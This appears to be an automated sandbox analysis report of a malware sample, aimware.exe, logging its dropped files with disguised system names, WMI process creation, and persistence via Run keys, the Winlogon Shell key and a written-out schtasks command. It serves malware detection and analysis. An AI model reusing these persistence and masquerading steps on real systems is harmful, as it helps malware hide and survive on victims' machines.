Source: C:\Recovery\spoolsv.exe	Section loaded: profapi.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\spoolsv.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\aimware.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Directory created: C:\Program Files\Microsoft Office 15\ClientX64\wDyQbcxdSUUjszASb.exe	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Directory created: C:\Program Files\Microsoft Office 15\ClientX64\3734501469df7e	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Directory created: C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Directory created: C:\Program Files\Windows Defender\en-US\3734501469df7e	Jump to behavior

Source: aimware.exe

Static file information: File size 2210583 > 1048576

Source: aimware.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: aimware.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: aimware.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: aimware.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: aimware.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: aimware.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: aimware.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: aimware.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: aimware.exe
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.pdb source: SurrogatesessionRuntimeBrokerDhcp.exe, 00000004.00000002.1780550988.0000000003512000.00000004.00000800.00020000.00000000.sdmp

Source: aimware.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: aimware.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: aimware.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: aimware.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: aimware.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.cmdline"
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dvzhjsuk\dvzhjsuk.cmdline"			Jump to behavior

Source: C:\Users\user\Desktop\aimware.exe

File created: C:\webFontsession\__tmp_rar_sfx_access_check_4475875

Jump to behavior

Source: aimware.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00ACF640 push ecx; ret	0_2_00ACF653
Source: C:\Users\user\Desktop\aimware.exe	Code function: 0_2_00ACEB78 push eax; ret	0_2_00ACEB96
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BAB539B push ss; ret	4_2_00007FFD9BAB53A1
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BAB4B61 push eax; retf	4_2_00007FFD9BAB4B67
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BAB479E push ss; iretd	4_2_00007FFD9BAB47A1
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BEAF29D push edx; ret	4_2_00007FFD9BEAF2A1
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BEAE252 push esp; ret	4_2_00007FFD9BEAE269
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BEAE9EB push ebx; ret	4_2_00007FFD9BEAE9EC
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BEA61A0 push ebp; ret	4_2_00007FFD9BEA61D8
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BEAE8EE push ebx; ret	4_2_00007FFD9BEAE8EF
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BEAF8A2 push ecx; ret	4_2_00007FFD9BEAF8B7
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Code function: 4_2_00007FFD9BEA9478 pushad ; ret	4_2_00007FFD9BEA948D
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BA9539B push ss; ret	25_2_00007FFD9BA953A1
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BA94B61 push eax; retf	25_2_00007FFD9BA94B67
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BA9479E push ss; iretd	25_2_00007FFD9BA947A1
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BAA877C push ds; retf	25_2_00007FFD9BAA879F
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BAA8DC9 push 8B48FFFFh; iretd	25_2_00007FFD9BAA8DCF
Source: C:\Recovery\spoolsv.exe	Code function: 25_2_00007FFD9BAC60B2 push ebp; retf	25_2_00007FFD9BAC60B8
Source: C:\Recovery\spoolsv.exe	Code function: 27_2_00007FFD9BB060B2 push ebp; retf	27_2_00007FFD9BB060B8
Source: C:\Recovery\spoolsv.exe	Code function: 27_2_00007FFD9BAD539B push ss; ret	27_2_00007FFD9BAD53A1
Source: C:\Recovery\spoolsv.exe	Code function: 27_2_00007FFD9BAD4B61 push eax; retf	27_2_00007FFD9BAD4B67
Source: C:\Recovery\spoolsv.exe	Code function: 27_2_00007FFD9BAD479E push ss; iretd	27_2_00007FFD9BAD47A1
Source: C:\Recovery\spoolsv.exe	Code function: 27_2_00007FFD9BAE877C push ds; retf	27_2_00007FFD9BAE879F
Source: C:\Recovery\spoolsv.exe	Code function: 27_2_00007FFD9BAE8DC9 push 8B48FFFFh; iretd	27_2_00007FFD9BAE8DCF
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 28_2_00007FFD9BAD60B2 push ebp; retf	28_2_00007FFD9BAD60B8
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 28_2_00007FFD9BAA539B push ss; ret	28_2_00007FFD9BAA53A1
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 28_2_00007FFD9BAA4B61 push eax; retf	28_2_00007FFD9BAA4B67
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 28_2_00007FFD9BAA479E push ss; iretd	28_2_00007FFD9BAA47A1
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 28_2_00007FFD9BAB877C push ds; retf	28_2_00007FFD9BAB879F
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 28_2_00007FFD9BAB8DC9 push 8B48FFFFh; iretd	28_2_00007FFD9BAB8DCF
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Code function: 29_2_00007FFD9BAA877C push ds; retf	29_2_00007FFD9BAA879F

Source: SurrogatesessionRuntimeBrokerDhcp.exe.0.dr	Static PE information: section name: .text entropy: 7.5389951668036375
Source: wDyQbcxdSUUjszASb.exe.4.dr	Static PE information: section name: .text entropy: 7.5389951668036375
Source: wDyQbcxdSUUjszASb.exe0.4.dr	Static PE information: section name: .text entropy: 7.5389951668036375
Source: spoolsv.exe.4.dr	Static PE information: section name: .text entropy: 7.5389951668036375
Source: wDyQbcxdSUUjszASb.exe1.4.dr	Static PE information: section name: .text entropy: 7.5389951668036375
Source: wDyQbcxdSUUjszASb.exe2.4.dr	Static PE information: section name: .text entropy: 7.5389951668036375

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files with benign system names

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe

File created: C:\Recovery\spoolsv.exe

Jump to dropped file

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File created: C:\Program Files (x86)\Google\wDyQbcxdSUUjszASb.exe	Jump to dropped file
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File created: C:\Recovery\spoolsv.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Users\user\Desktop\aimware.exe	File created: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File created: C:\Users\user\Desktop\IqrHyRPU.log	Jump to dropped file
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File created: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File created: C:\Users\user\Desktop\EJYQaGiX.log	Jump to dropped file
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File created: C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File created: C:\Users\user\Desktop\HIyZMmJW.log	Jump to dropped file
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File created: C:\Program Files\Microsoft Office 15\ClientX64\wDyQbcxdSUUjszASb.exe	Jump to dropped file
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File created: C:\Users\user\Desktop\NUmFqbLL.log	Jump to dropped file
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File created: C:\Users\user\Desktop\KbMQbIAl.log	Jump to dropped file
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File created: C:\Users\user\Desktop\BssArfvD.log	Jump to dropped file
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File created: C:\Users\user\Desktop\ziWzrNQC.log	Jump to dropped file
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File created: C:\Users\user\Desktop\FRcYkGBu.log	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Windows\System32\SecurityHealthSystray.exe

Jump to dropped file

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File created: C:\Users\user\Desktop\FRcYkGBu.log	Jump to dropped file
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File created: C:\Users\user\Desktop\KbMQbIAl.log	Jump to dropped file
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File created: C:\Users\user\Desktop\BssArfvD.log	Jump to dropped file
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	File created: C:\Users\user\Desktop\ziWzrNQC.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File created: C:\Users\user\Desktop\NUmFqbLL.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File created: C:\Users\user\Desktop\IqrHyRPU.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File created: C:\Users\user\Desktop\HIyZMmJW.log	Jump to dropped file
Source: C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe	File created: C:\Users\user\Desktop\EJYQaGiX.log	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell	Jump to behavior

Creates multiple autostart registry keys

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatesessionRuntimeBrokerDhcp	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run spoolsv	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wDyQbcxdSUUjszASbw" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\en-US\wDyQbcxdSUUjszASb.exe'" /f

Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run spoolsv	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run spoolsv	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run spoolsv	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run spoolsv	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatesessionRuntimeBrokerDhcp	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatesessionRuntimeBrokerDhcp	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wDyQbcxdSUUjszASb	Jump to behavior

Source: C:\Users\user\Desktop\aimware.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
